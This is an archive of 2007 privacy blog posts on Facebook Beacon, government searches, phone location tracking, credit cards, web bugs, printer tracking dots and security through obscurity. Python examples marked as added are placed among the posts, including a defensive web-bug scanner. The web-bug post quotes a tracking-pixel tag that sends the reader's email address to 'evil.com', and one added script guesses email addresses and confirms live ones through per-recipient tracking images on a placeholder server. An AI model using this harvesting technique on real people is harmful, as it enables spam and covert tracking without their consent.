Sunday, December 30, 2007

Don’t Go Towards the Light – Facebook and Beacon

Recently it has been hard to keep on top of the unfolding problems at Facebook. For those who are unaware of what Facebook is, it is a social networking site popular amongst college students. Of course, this didn’t send them into the netherworld of online privacy issues. No, their problems started with their privacy policy; most importantly, what it didn’t say. What it didn’t say is that Facebook employees might just be browsing your online activity (which Facebook tracks) for their own entertainment. Now that might raise some issues, but that is at least the caveat emptor of privacy policies. In an age where privacy policies are narrowly tailored, it falls to the user to think of all the things that a company could do with their information and decide if they want their information used that way before accepting the terms of service (and many companies change their privacy policy at will and without notice). This is an interesting bent on contracts and informed consent. The contract is being modified at any time and without notice (note: most sites do this, not just Facebook). Furthermore, this is a one-sided contract modification (much like the strategy credit card companies use). There is no negotiation, and there is probably a serious question as to whether both sides are agreeing to the contract with the new policy (I know of more than one company that gets people to agree to changes in the employee handbook before they get to see it!). Although concerning, this probably pales in comparison to the recent brouhaha over their Beacon software.

Beacon is Facebook’s advertising platform. Facebook tracks its users’ actions on the web (including off its site). It then posted this information for all to see on their page. This meant that if you had a friend who wanted a new GPS for Christmas and you went to buy it for them online, they might see that you had just made the purchase on your page (whoops, surprise gone). Worse yet, what if you wanted a GPS and so did someone else, and they told you they weren’t buying gifts this year, or were doing something else, but you could see they bought one for someone else? This policy was opt-out, so it was on by default. When news of this broke, Facebook turned off this feature; sort of. It turns out they didn’t turn it off at all, they just turned off the reporting part of it. So they were still tracking you; you just couldn’t see them doing it so visibly. Finally Facebook let users completely opt out of the system.

Opt-out has become the mantra of the marketing industry (assuming tacit acceptance of their practices). There is an interesting debate in the tech community about whether it is better to use technology to stop such things (NoScript and AdBlocker can be used to block Beacon completely (for the moment) if you have Firefox), while others say that policy should be implemented to stop such actions. Finally, there are those who feel that consumer pressure will drive this (I got an email from one social networking site saying how they would never implement such a system; of course there is some bitter irony there since they sent me that email without my permission through a spam posting on another social networking site). Which solution will work best (policy, technology or market pressure) is an interesting debate, each with its own merits. What is clear is that what is in place now is not working.

Wednesday, December 19, 2007

A Response To The Re-definition Of Privacy

***The following is a response to this posting (http://privacy-law.blogspot.com/2007/11/is-privacy-still-privacy.html) on the re-defining of privacy. ***


This is a dangerous game of re-definition. Indeed, it is not the benign use of private data that privacy law is designed to protect against. The misuse of data is the concern, and therein lies the problem such re-definitions seek to maneuver around.
In the case of government, 4th Amendment protections are there for those who have been wrongly searched and to protect people from intrusive, and intimidating, searches. The promise that "we'll look but trust us, we won't tell anyone or use it against you" is of small comfort. Privacy from a governmental aspect is a concern based not only on what is happening now, but on what may happen in the future. The example I think makes this most clear is Germany in the 1930s. To be Jewish in Germany in 1931 was not much reason for hiding this affiliation. By 1939, hiding this fact was, for some, a matter of life and death. The best protection a citizenry has against such misuses of information is to prevent its collection in the first place.

In the private sector, the challenge is that the only recourse people have is civil. This creates a problem where an organization may choose to violate its privacy policy (we'll ignore the issues of informed consent, changing contracts without re-affirmation and liberty for now). A good example of this is when .coms in the late 90s would sell their only asset (a user list) upon bankruptcy. People who had their "private" information sold had little recourse since the company that they had given their information to (and thus had the contract with) was no longer around (and even if it were, the fact that it was in bankruptcy ensures that there would be relatively little way for them to receive adequate compensation for the wrong, or for the court to provide a disincentive against such actions happening again).

My point in these two examples is that this re-definition has far-reaching consequences that are somewhat masked by the gentle nature of the re-definition. People need to be sure they understand such implications before we re-write the law to turn the veil of privacy into the hope of non-disclosure.

Sunday, October 14, 2007

Security or Transparency; different views of privacy

When it comes to dealing with private information, there tend to be two paradigms that I hear espoused most frequently: secrecy and transparency. Those who favor the secrecy paradigm believe that information needs to remain hidden from others. People who subscribe to this paradigm tend to be those whom we might usually have considered privacy advocates. From this point of view come most of the writings that you find on the topic of privacy. Implicit in most discussions of the secrecy view of privacy is that information needs to be kept secret from all other parties.

It is easy to see how to support this view; people point to the tracking information used by government databases, marketing lists and nosey neighbors as evidence of the need for privacy. Stories such as how the Nazis used public records to track Jews are often used to show the dangers in government consolidation of private information. What is less clear is how the transparency paradigm works.

On the other side of this discussion is the idea that transparency may be the best way to deal with security. This is an interesting model since it relies on two things: acquiescence to power and belief in benevolent (or controllable) leadership. In this case the idea is that certain pieces of data need to be inspected as part of contractual obligations, legal mandates or national interests. In such situations, it isn’t that the information needs to be protected from all viewers, but that the dissemination or use of that data beyond defined limits should be banned or protected through civil litigation.

Some examples of these two views in action are Amazon.com and British Petroleum. Amazon.com has a large set of (sometimes onerous) remote access and data protection measures that are intended to protect the integrity of Amazon.com’s intellectual property. Like many high tech companies, Amazon is concerned that anyone might access its data inappropriately and thus has erected major hurdles to accessing this information (hurdles that exist for those who legitimately want to access it as well).

On the other side of this discussion is British Petroleum. BP has decided to take some of its critical systems (like email) and have them hosted by third parties (making them far easier to access from a governmental and legal discovery aspect). BP makes a compelling argument that any of these resources could be “discovered” through governmental powers or legal subpoenas, so spending money and resources to “hide” these assets is not very valuable. In their mind, the money it would cost to implement such functions is not worth the cost.

Clearly other organizations take a different view. What is interesting is that this view is a bit like other models we see. From the CEO of Sun Microsystems saying “Privacy is dead, get over it” to the explosion of social networking sites like MySpace, Orkut, Friendster and Facebook, it does appear that people feel ok giving up more of their personal information online than would have been discoverable through general detective work.

When might this matter? This week it was discovered that the NSA sought to set up warrantless wiretapping of Americans. This isn’t much of a revelation since the White House stated that this was done in response to the 9/11 attacks. For better or worse, most Americans accepted this as a trade-off of liberty for temporary security, but it now appears that this program was started before 9/11. This is a big shift from what we’ve heard before. Under the secrecy paradigm, this would be quite concerning. Effort would be spent investigating and trying to change laws to roll back this system. On the other hand, if the transparency (or disclosure) paradigm were the idea from the start, there would be no issue, worry or cost to such an action.

Some people might point out that the “transparency” view is really just a pretty package around the loss of privacy. I would point out that there are important distinctions that are part of this view, though. All information is not public; it is simply managed differently. Liability would apply to its abuse, while the efficient transfer of this information could facilitate the efficient adjudication of issues and protection of citizens. At the root of this view is the belief in differentiating what you want to hide and the benevolence of those who hold this information. Ultimately it’s a matter of trust and accountability. Secrecy has always been about trust; the transparency paradigm shifts the thinking around trust from a “me against the world” to an “us against the others”. Different organizations (and people) are choosing to act on each of these philosophies. Time will tell us which works best for society.

Sunday, October 7, 2007

Third parties are like third wheels; rarely wanted.

Much of our communication these days is sent through third parties. Indeed, it’s pretty hard to think of anything besides face-to-face communication (or passing notes in gym class) that doesn’t go through a third party. I’d love to use the passing notes example as one that is analogous, but the fact is that it’s only half the story. Most communications (like phone calls, wireless phones, and cell phones) pass through third parties. Those parties can monitor those communications (with varying levels of required legal permission). This isn’t anything surprising since most people know about things like wiretaps. What may be surprising is that in the case of electronic communications, not only can your communications be intercepted; they are (in many cases) recorded and archived.

This came to many people’s attention during the Kobe Bryant case. To give a quick refresher: they were combing through the alleged victim’s text messages to see what she was saying to other people after the alleged incident. The same thing happens with emails.

At issue in each of these cases is the fact that communications are stored on a third party server. That server then monitors those communications, archives them, or both. This means that those communications are legally discoverable and have a lower level of legal protection than other communications you may have. For example, speaking to someone is protected since you can’t be forced to incriminate yourself (5th Amendment). Recording a conversation between two parties requires the consent of both in many states. On top of these, parties involved in such conversations might fight the discovery of such pieces of evidence, should they exist. On the other hand, third parties have less of an incentive to protect this information. In some cases they actually have reason not to protect it. These reasons can be anything from wanting to maintain good relations with the government (which regulates their communications through licensing) to not wanting to endure the legal costs of protecting someone else’s information.

In each of the presented cases, the take-away is that information that transfers through third parties is out of your control. Just like property (which is the paradigm that the law uses for most personal information), once you give it to someone else (like a phone company or an email service) they have a different (lower) set of incentives to keep that information safe. You should always be aware that when you pass information through others, there is the chance that they may read, archive, or even change that information.

Monday, October 1, 2007

Cell Phones – Is that a locator in your pocket or are you just happy to see me?

Cell phones are nearly ubiquitous these days. Many of us carry them with us at all times and give little thought to how the technology works. I won’t go into the legal differences for cell phones vs. land lines (there are drastically different legal treatments of the two technologies when it comes to tapping the “line”), but I do want to talk a little about cell phones as tracking devices.

You’re probably used to your phone working wherever you go, and you have probably never given a lot of thought to the question of “how does the phone company know to make my phone ring no matter where I am?” Do they send that same ring out to every tower in all the cell networks in the world simultaneously? Of course not. So how does it know to connect your call to you, where you’re at? The answer is that your phone does a “ping” every once in a while. This ping (much like the computer networking term and the naval term it derived from) is sent from your phone to the closest cell tower to let it know that you’re there. This way the phone company knows where to send your calls when they come in. What you may not know is that the phone companies keep these records. In effect they have a log of where you are, and have been, for years. In Ireland this has sparked a legal battle, though nothing of the sort has erupted here in the US.

Of course this information isn’t all nefarious; it is necessary for the network, and is now required by the US government. Thanks to E911 legislation, cell carriers are now required to be able to get the coordinates of a cell phone user who calls 911. Of course this technology is equally useful for locating users for other reasons. It hasn’t taken marketers long to see the benefits of this. McDonald's knows that no matter how much it spends on advertising, most of its sales come from people who see a restaurant and drive in (or through). This is partially why you see fast food restaurants everywhere and why you see competing restaurants near each other. Now think if you could contact those people and send them a message: “stop in the Burger King ahead and get a $0.99 Whopper”.

Consumers are also being sold this technology. In some cases it’s a mapping service, while in others it’s a set of personal tracking services. Many of these are sold to parents as a way to keep track of their children. In other cases people are using the technology so they can keep in touch with their friends (Mologogo, MSSLAM).

The take-away is that, whether you know it or not, your cell phone is always tracking where you are. This data is stored for an undisclosed period of time. You are also not able to have this data deleted or keep it from being collected (unless you turn your phone off). Since this data is sent at all times your phone is on, it provides a very descriptive set of information about where you are, and have been. I’ve known more than a few privacy advocates who use pay-as-you-go cell phones and get new phones every month in order to diminish their traceability. This seems a bit extreme to me, though each of us will decide what level of privacy we want. Remember that since this is not considered your data (legally speaking), you should be comfortable with this data being collected, and potentially sold. Some countries (like Germany) have enacted privacy legislation to allow users to request that their data be completely removed from a system (the current case deals with computer IP information). Of course this is in response to the European Commission’s Data Retention Requirements.

Sunday, September 23, 2007

Privacy and Privileges: The back door to compelling information disclosure

The 4th and 14th Amendments ensure that the federal and state governments cannot search through our persons and effects without our permission. Additionally, the 1st Amendment protects our freedom of speech as well as our freedom of association (considered part of protected speech). Now there are exceptions to this. The most obvious one is the USA PATRIOT Act that I’ve written about before. This act gives the government the ability to do “sneak and peek” searches of your computer and home without your consent or a warrant. That act aside, in general we either need to consent to a search, or the government needs enough information to issue a warrant to allow a search.

The reason all this matters is that most people rely on the government at some point in their lives (many of us on a daily basis). If you don’t think you do, think about a couple of examples. First, the case where the government gives you financial assistance. From tax breaks for children, to student loans, Pell grants, to the Montgomery G.I. Bill funds, from welfare to Medicare or Social Security, it is highly likely that you have received, are receiving or will receive some help from the government. In such cases, the government has used this “non-required” assistance to justify searches that would be unconstitutional in any other aspect. The contemporary example is the legal fight going on right now in San Diego over those who receive public assistance. Part of this legislation gives agents of the state the ability to search people's homes to ensure that they are complying. Perhaps you feel that this is a fair trade-off to ensure public aid isn’t abused and that it provides an incentive for people to do what they can to get off of public assistance.

The people who make this argument tend to be those who have done well in life and are not subject to such searches (it’s always easier to legislate what someone else should do). Fear not though, this is where the “privileges” part of this comes in. Through legislation like the REAL ID Act (currently being fought in a number of states), data is being aggregated and centralized. So if you drive a car, then that information is collected (and if all states comply, then that will be national; this is why many states are fighting the act and why most private investigators use driver's licenses as their preferred way to track people). Even if you forgo the car, if you travel by air, then you are still under surveillance (and remember this is surveillance without any reasonable cause to surveil you). As has come out recently, airport screeners were cataloging the information of travelers heading overseas. Information like who they were seeing/staying with, what was in their luggage and even what books they were reading was cataloged and stored. The government is “loosely” kept from sharing this information by the Privacy Act of 1974.
Unfortunately, the Supreme Court ruled in Doe v. Chao that the act's mandated damages of at least $1000 are only due if the injured party (the one who had their private information given out by the government) can show actual damages from the leak (of course, finding out that someone shared info that got you on a no-fly list, blocked from getting a government grant or surveilled by the FBI to your economic detriment might be pretty tough).

What is clear in these cases is that our view of individual rights is not evolving with our society. We are continuing to interpret our rights in the same manner that was done tens, if not hundreds, of years ago. In a world where “privileges” (like driving, flying and receiving assistance) are an integral part of almost every US citizen’s (and business’) life, we may want to start thinking about the ways we feel privileges are separated from rights. We all appreciate the freedoms we have here in the US. Many of us believe that our privileges are really just extensions of our rights, but at present this is not the case at all. Since many of these “privileges” are requirements for us in modern life, what we may be looking at is a loophole that’s being actively exploited to circumvent the 4th and 14th Amendments.

Is this the right balance to strike? That is a decision for the American people, but I don’t think it bodes well when such actions are taken outside of the public light (the traveler information only came to light as part of a Freedom of Information Act (FOIA) suit). I think changing circumstances require US citizens to consider the tradeoffs they make, but when these are forced through programs that are voluntary in name only, or are done out of the public sight, the specter of a meddling government, instead of one of, by and for the people, starts to show up.

Sunday, September 16, 2007

Credit Cards: The Pocket Snitch

I once heard that in France they have a saying that if you want to find the scandal with a politician, you should “follow the women”; in the States we’d more likely say “follow the money”. Setting aside the indications about what is important to each culture’s men, this creates a telling situation about how people go about investigating each other.

When I was younger I took quite readily to credit cards. I enjoyed the ability to spend when I wanted to (a habit it appears our culture has embraced somewhat zealously) while being free from the potential of a lost wallet (to forgetfulness or robbery). What I never considered was what I was giving up for this convenience. For me, my fiscal responsibility kept the dangers of credit card debt from ever becoming the problem it is for most folks in the United States today, but the tracking capabilities are quite real.

For the moment I’m going to set aside the financial implications of someone adding a 2-5% fee on every transaction and how that can raise prices for consumers; I’m going to focus mostly on the privacy implications. Just think about your credit card bill: every month you get a nice list of where you were, with locations, dates, times and even how much you spent. Look at these records over time and you get a view of what a person’s life is like. Indeed, advice given to those concerned about stalking advises them not to use credit cards because of their traceability. In most cases, we aren’t being stalked by anyone more sinister than marketers, and some might reasonably ask, “I’m not worried about stalking, why should I care?” The answer is that this valuable form of data aggregation is not only used by marketers and stalkers, but also by law enforcement and governments to spy on their populations. Section 215 of the USA PATRIOT Act gives the US government the ability to look at third-party holders of a person’s information (like an email provider or a financial institution). Of course the US government has been monitoring financial transactions of a certain size ($10,000 or greater) for a while through FinCEN. What the USA PATRIOT Act did was increase the government's ability to get access to these records (and without your knowledge).

From a privacy perspective, it is the potential for abuse of this data that is most concerning. Where you eat and shop, what organizations you donate to and your personal habits are all contained in the records created by these little cards. Cash, on the other hand, “tells no tales and leaves no trails”; or so you might think. At least here in the States this is true, though other parts of the world are experimenting with traceable money under the auspices of currency protection.

The bottom line is that money is the base unit of transactions in our world. Because of this, the ability to see how a person spends their money tells you a lot about who they are, so we need to be careful about who we give this information to. Some people, like Jerry Springer, find out the hard way that financial records can tell tales they would rather not have told (Jerry was caught using a personal check at a house of ill repute while he was a Cincinnati city council member). Both the appearance of data and its absence are things some might be concerned about (if you eat lunch every Saturday at the local pizzeria and one Saturday you don’t eat there, someone might wonder what caused the change in circumstances, especially if an investigation is ongoing about an occurrence on that date). So the next time you reach for the plastic, just remember that you’re checking your privacy at the counter.

Sunday, September 9, 2007

Web Bugs: Is your email infested?

In an earlier post I mentioned Web Bugs. Web Bugs are a piece of code that is virtually invisible to users of the web, but they allow the people who plant them to track you. How this works is that they add an image to an email (most of us are using HTML email these days), and they add this image in a way that you don’t see it. How do they do that? By making it 1 pixel (the smallest dot on your computer screen) and then making that pixel transparent (so even if you knew which pixel it was, you couldn’t see it). The trick is that the image isn’t an image at all, but a special web page that is designed to return a clear 1-pixel image while recording and interpreting the query string data in the request. So a regular image might look like this in your web-coded email: <img height="110" src="http://www.images.com/puppies.jpg" width="120" />; but the web-bugged one might look like this: <img src="http://www.evil.com/tracker.cgi?email=you@email.com" width="1" />. The part where it has your email address (you@email.com in this case) is passed to evil.com’s server, where they can record your computer's address (IP address) and the time you accessed the email, and then record every time you open that mail. If they wanted to, they could even put a cookie on your machine to track you if you went to another site where evil.com had code running (or images showing, like an ad server).

Why do spammers, snoops and stalkers use this kind of tool? Because it works and because they can be sure you got the message. In newer versions of email programs (like Outlook, Eudora, Thunderbird, etc.) users can set up their mail so that images do not show automatically. You may have already seen a page that looks like this:

The reason you have to click on a link to show the images is that it gives you a chance to see if this email is one you want to view before letting a potential spammer know that they now have your email address. Since many webmail companies (Gmail, Live, Yahoo, etc.) automatically show you HTML emails, the Web Bugs work by default on those sites (which are used by a majority of web users).

Before, I mentioned stalkers. That was not an idle statement. Several web companies now sell you the ability to attach web bugs so that you can tell if someone has received your email. Since the technology is pretty simple, most companies that do email marketing on the web have built their own Web Bug engines to help them track users. In many cases web filters and anti-spam filters block the sites the bugs attach to, but this is only effective as a reactive means of protection. If you are truly concerned about Web Bugs tracking you online, switching your email client to “text only” from HTML email will ensure that these Web Bugs can’t track you.
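The mechanism described above can be checked for from the receiving side. The following is an added example (not code from this blog): a small Python scanner that parses an HTML email body and flags remote images that match the web-bug pattern the post describes (1-pixel size, an email address in the query string, or an image served by a script such as tracker.cgi). The sample message, the heuristics and the function names are constructed for this example.

```python
"""Flag likely web bugs (tracking pixels) in an HTML email body.

Added example for this post; not the blog author's code. The heuristics
follow the post's description: a remote <img> that is 1 pixel wide or
high, whose URL embeds an email address in its query string, or whose
"image" is really a script endpoint that can log the request.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
SCRIPT_RE = re.compile(r"\.(cgi|php|aspx?|jsp)$", re.IGNORECASE)


class ImgCollector(HTMLParser):
    """Collect the attribute dict of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    # HTMLParser calls this for <img ...> and, via handle_startendtag,
    # for the self-closing <img ... /> form as well.
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append({k: (v or "") for k, v in attrs})


def _dimension(value):
    """Parse a width/height attribute; None when absent or unparsable."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def classify_image(attrs):
    """Return the reasons this <img> looks like a web bug (empty list = benign)."""
    reasons = []
    url = urlparse(attrs.get("src", ""))
    if url.scheme not in ("http", "https"):
        return reasons  # inline (cid:) or data: images never hit a tracking server
    width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    if (width is not None and width <= 1) or (height is not None and height <= 1):
        reasons.append("1-pixel image")
    if any(EMAIL_RE.fullmatch(v) for vals in parse_qs(url.query).values() for v in vals):
        reasons.append("email address in query string")
    if SCRIPT_RE.search(url.path):
        reasons.append("served by a script rather than a static file")
    # A query string alone is common on legitimate images, so it only
    # strengthens a verdict that another signal already produced.
    if reasons and url.query:
        reasons.append("carries a query string the server can log")
    return reasons


def find_web_bugs(html):
    """Return [(src, reasons)] for every remote <img> that scores as suspicious."""
    parser = ImgCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for attrs in parser.images:
        reasons = classify_image(attrs)
        if reasons:
            hits.append((attrs.get("src", ""), reasons))
    return hits


# Constructed sample message built from the two <img> tags quoted in the post.
SAMPLE_EMAIL = """
<html><body>
<p>Look at these puppies!</p>
<img height="110" src="http://www.images.com/puppies.jpg" width="120" />
<img src="http://www.evil.com/tracker.cgi?email=you@email.com" width="1" />
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in find_web_bugs(SAMPLE_EMAIL):
        print(src, "->", "; ".join(reasons))
```

Because an image is only fetched when the client renders it, a scanner like this belongs in a mail filter or a client that blocks remote images by default; the text-only setting the post recommends avoids the fetch entirely.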

Sunday, September 2, 2007

The Naked Truth: Are Strip Searches An Invasion Of Privacy?

When I read that in 1978 Chicago was strip searching every woman who came into its women’s jail I was surprised (to put it mildly). I thought, “Are you serious?” This became all the more shocking when it became clear that the woman was at the jail because of unpaid parking tickets. I thought that our society was far past the point where that would be considered reasonable. Alas, sometimes we are too hasty with our desire for what we consider “obvious” changes. What made it all the more shocking was when I learned that Washington State, just last year, had its appeals court strike down blanket strip searches. Perhaps it seems obvious to most folks that unless you pose a serious risk or the police have a warrant, they shouldn’t be able to make you go through such an obviously invasive search. This is important not only because of its obvious implications for everyday citizens, but also because this is the core of a privacy discussion (being secure in your “persons, houses, papers and effects”). If such things as strip searches are “up for debate” then we can’t possibly have a serious debate about electronic observation and privacy invasion.

It might be valuable to hypothesize about how we got to such a point. As a matter of efficiency, and perhaps as a matter of avoiding bias, the Chicago PD had a policy of strip searching any female prisoner who came into the facility (they had one for all of Chicago at the time). Is it possible that there was so much contraband that everyone was suspect? Was it possible that to search only certain individuals would open the Chicago police up to claims of bias? On the first there is little evidence to support this; on the second (given the Chicago PD's history) it is entirely possible.

So it would seem that the answer to our question as to whether strip searches are a violation of privacy is self-evident. What is more shocking is how distant what we might think as average citizens is from what may be the reality (depending on the jurisdiction you are in). In all, it really comes down to one of those fundamental questions we will ask ourselves (as a society): “How much liberty are we willing to give up in pursuit of security?” I won’t make the claim, as Benjamin Franklin did, that “Those who would give up essential liberty to purchase a little temporary safety, deserve neither liberty nor safety.” But I will note that the solution to our criminal problems is probably not in strip searching parking ticket violators. That, I would hope, would be clear to anyone.

Sunday, August 26, 2007

Law Enforcement’s Latest Stoolpigeon: Your Laser Printer

Whether you know it or not, almost all color laser printers manufactured in recent years have an important feature not listed on the box: a unique identifier. Much like the MAC address on network cards (covered in more depth in another posting), your laser printer is unique. Since most things we have bought of some value have serial numbers, this might not be so concerning, just as our car has the VIN number etched in several places but no one is saying cars are giving up their privacy. This is where those analogies end though. The reason is that your laser printer has a technology in it called “Docucolor” (clearly the people who came up with this aren’t beating Saatchi and Saatchi away from job offers). Docucolor uses a matrix of extremely hard to see yellow dots to identify the printer. Using these dots, they can identify the printer’s serial number. Since color laser printers are only sold through a few channels, this makes tracking down the person who purchased the printer (usually with a credit card) fairly easy.

Why is this technology there? In the first place, it was put into color laser printers because their quality had gotten so good that the Secret Service (the part of government responsible for protecting the currency as well as our officials) was worried that counterfeiters could just print money. To be able to trace such activity they had Xerox install this technology. It should also be noted that popular image editing software inhibits counterfeiting in a similar way: it looks at images loaded into it and, if an image looks too much like currency, the program won't allow the scan/import.

So the roots of this seem valid enough; the problem is that once the technology is out there, it is that much easier for those who can read this information to remove the anonymity of anyone who has made a printout. What makes it more nefarious is that it is done surreptitiously, so people do not know that there is identifying information in their printouts, and it marks every page, not just the ones that look like money. Imagine what the outcome would have been if the Dunlap Broadsides had identified which of our founding fathers signed that treasonous declaration that helped launch this great nation.

As a practical matter, if you are worried about being traced through a laser printer, I would suggest using an inkjet printer (they are pretty disposable these days). Since the pattern carries a date and time stamp, users should also consider that public printers (universities, workplaces, print shops like Kinko's, etc.) will most likely create a record of your printing through security cameras. Between those cameras, the timestamp in the dots and your payment record (unless you pay cash), you may well provide the means to identify yourself when making such printouts.
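To see whether a page carries such a pattern, the usual trick is to scan it and look at the blue channel (yellow toner absorbs blue light, so the dots go dark) or to shine a blue LED on it. The following is an added example, not code from the original post: it runs on a plain list-of-rows RGB image so it needs no image library, the page and the dot positions are constructed for the demonstration, and the colour thresholds are assumptions that would need tuning against a real scanner.

```python
"""Locate faint yellow tracking dots on a scanned page and estimate the grid
pitch. Added example; the test page, dot colour and thresholds are constructed."""


def is_yellow_dot(pixel, min_rg=200, max_b=235, min_gap=25):
    """Yellow toner on white paper: red and green stay high, blue drops.
    The thresholds are assumptions; tune them against a known-clean scan."""
    r, g, b = pixel
    return r >= min_rg and g >= min_rg and b <= max_b and (min(r, g) - b) >= min_gap


def find_dots(image):
    """Return sorted (row, col) coordinates of every yellow pixel."""
    return sorted((y, x) for y, row in enumerate(image)
                  for x, pixel in enumerate(row) if is_yellow_dot(pixel))


def grid_pitch(coords):
    """Smallest recurring gap between dot rows and between dot columns, in pixels.
    Tracking dots sit on a fixed lattice, so a marked page gives one small pitch
    in both directions; random yellow smudges do not."""
    def pitch(values):
        distinct = sorted(set(values))
        gaps = [b - a for a, b in zip(distinct, distinct[1:])]
        return min(gaps) if gaps else None
    return pitch([y for y, _ in coords]), pitch([x for _, x in coords])


def blue_channel(image):
    """Keep only the blue channel as a greyscale image: yellow absorbs blue, so
    dots that are invisible in colour become dark specks on a light background."""
    return [[pixel[2] for pixel in row] for row in image]


def make_test_page(height=40, width=40, pitch=8, empty_column=20):
    """Constructed page: white background, faint yellow dots every `pitch` pixels,
    with one dot column left empty to mimic a 0 bit in an encoded pattern."""
    white = (255, 255, 255)
    dot = (255, 250, 190)  # faint yellow: hard to see, easy to threshold
    page = [[white] * width for _ in range(height)]
    for y in range(4, height, pitch):
        for x in range(4, width, pitch):
            if x != empty_column:
                page[y][x] = dot
    return page


if __name__ == "__main__":
    page = make_test_page()
    dots = find_dots(page)
    print(f"{len(dots)} dots found, grid pitch (rows, cols) = {grid_pitch(dots)}")
    # To run on a real scan with Pillow (an assumption, not part of the post):
    #   img = Image.open("scan.png").convert("RGB"); w, h = img.size
    #   px = list(img.getdata()); page = [px[i * w:(i + 1) * w] for i in range(h)]
```

On a real 600 dpi scan the dots are a few pixels wide rather than single pixels, so cluster neighbouring hits before computing the pitch; the thresholds above will also need loosening for off-white paper.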

Sunday, August 19, 2007

Hiding in Plain Sight: Security by Obscurity is Poor Strategy

Though some of you may not have heard the phrase "security through obscurity", you probably know exactly what I'm talking about. For those who need a more lucid example, allow me to provide one. You may figure you will not end up on any spam email lists if you don't give out your email address to anyone but friends. You might also think that if you post some pictures of a party you went to online (or a video, or a blog) no one will find them, and that they are effectively safe by being lost in the mountains of other information out there. This notion has some historical relevance, since it allowed the publication of anonymous pamphlets (think Common Sense and the Federalist Papers) and frustrated government (or private) persecution of individuals (think of trying to track everyone in a civil rights march). In short, blending into a crowd, or hiding amongst others, provided a sufficient level of privacy for most people.

I would hypothesize that the privacy hinted at several times in the Bill of Rights was in the minds of our founding fathers. Few people of the time could have foreseen the information revolution, and thus a sufficient amount of protection was provided by blending in. Of course there are negative connotations to this as well (the person who throws a rock from a crowd or fires a shot). The change comes when you have ways to aggregate that information; the assumed level of security disappears. Searches online can find users' blogs; face recognition software will soon allow you to search for pictures of people based upon other pictures or the tags that have been applied to photos; spammers use automatic generation of likely email addresses and "web bugs" (tracking images, to be discussed in another posting) to confirm your email address even if you never gave it to anyone.

The takeaway from this is simple: don't assume unprotected information is hidden. Marijuana growers thought they were safe using grow lamps within their homes until Mr. Kyllo found out that the police had something called a thermal imaging camera that let them see what was happening in his home. Search engines let people find information you may have posted (perhaps to an online medical support group). Another example is that police now take pictures of protesters in crowds for later review (possibly for archiving as well; in some cases they may just want the video that you shot, as in the Josh Wolf case). The bottom line is that new technology will make information aggregation and discovery much easier than ever before. This has significant social implications (both positive and negative), but from a privacy standpoint the lesson is simple: don't rely on hiding in a crowd.
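A concrete version of the web-bug point above, as an added example that is not from the original post (the domain, names, key and server log lines are all constructed): the spammer does not need your address, only a dictionary of likely ones and a per-recipient tracking image. Whichever guessed mailboxes load the image are confirmed live, and the image server's own access log is the harvest. The countermeasure is simply a mail client that does not load remote images automatically.

```python
"""Address guessing plus a tracking image ('web bug'): which guessed addresses
are live is learned from the image server's log. Added example; the domain,
names, key and log lines below are constructed."""
import hashlib
import hmac
import itertools
import re

FIRST_NAMES = ["alice", "bob"]
LAST_NAMES = ["jones", "smith"]
PATTERNS = ["{f}.{l}", "{f}{l}", "{f[0]}{l}"]   # common corporate address styles
DEMO_KEY = b"constructed-demo-key"             # sender's private mapping key


def generate_candidates(domain, first=FIRST_NAMES, last=LAST_NAMES, patterns=PATTERNS):
    """Dictionary-style guesses at addresses that probably exist at `domain`."""
    return [p.format(f=f, l=l) + "@" + domain
            for f, l in itertools.product(first, last) for p in patterns]


def beacon_token(address, key=DEMO_KEY):
    """Per-recipient token for the image URL. Keyed, so a recipient who reads
    the HTML cannot tell that the token is derived from their address."""
    return hmac.new(key, address.lower().encode(), hashlib.sha256).hexdigest()[:16]


def beacon_url(address, base="http://tracker.example/px.gif"):
    """The 1x1 image reference embedded in each message."""
    return f"{base}?t={beacon_token(address)}"


LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /px\.gif\?t=(?P<tok>[0-9a-f]{16}) HTTP/1\.[01]" 200')


def confirmed_addresses(log_lines, candidates, key=DEMO_KEY):
    """Map tokens fetched from the image server back to guessed addresses.
    A hit means the mailbox exists and its client auto-loaded remote images."""
    lookup = {beacon_token(a, key): a for a in candidates}
    hits = {}
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and m.group("tok") in lookup:
            hits[lookup[m.group("tok")]] = (m.group("ip"), m.group("ts"))
    return hits


def constructed_log(live_addresses, key=DEMO_KEY):
    """Fabricated access-log lines for the demo: one fetch per live address,
    plus one unrelated request with a token nobody was sent, which must be ignored."""
    lines = [f'203.0.113.{i + 1} - - [19/Aug/2007:10:{i:02d}:00 +0000] '
             f'"GET /px.gif?t={beacon_token(a, key)} HTTP/1.1" 200 43 "-" "Mozilla/4.0"'
             for i, a in enumerate(live_addresses)]
    lines.append('198.51.100.9 - - [19/Aug/2007:10:59:00 +0000] '
                 '"GET /px.gif?t=0123456789abcdef HTTP/1.1" 200 43 "-" "curl/7.16"')
    return lines


if __name__ == "__main__":
    guesses = generate_candidates("example.com")
    live = ["alice.jones@example.com", "bsmith@example.com"]
    for addr, (ip, ts) in confirmed_addresses(constructed_log(live), guesses).items():
        print(f"{addr} confirmed live from {ip} at {ts}")
```

The same mechanism, run by a legitimate sender, is how newsletters count "opens"; from the recipient's side the two are indistinguishable, which is why the defence is to block remote images rather than to try to tell good beacons from bad.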

Sunday, August 12, 2007

You Are What You Look For – Search Engines And Data Profiling

